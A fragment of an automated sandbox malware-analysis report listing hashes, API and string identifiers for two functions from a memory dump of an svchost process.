                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 130e87942d0e0c6d0456325ff2bc0814ae33aee10acfd8dc0b9fc2b8868df37b
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: FDE08671690B4990EF038F66E8416D837A0DF98B6CBC89122995D57311FB3CD1E9C311
                                                                                Function 000001CA97FD73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 5ec6e1aa0c21c2a9d54db6f90e025f6508c94ea03da05262c35edcb0eb738dc6
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 08E08671650B4880EF038F65E8415D877A0EF58B5CBC89122C95D57311EB3CD1E5C311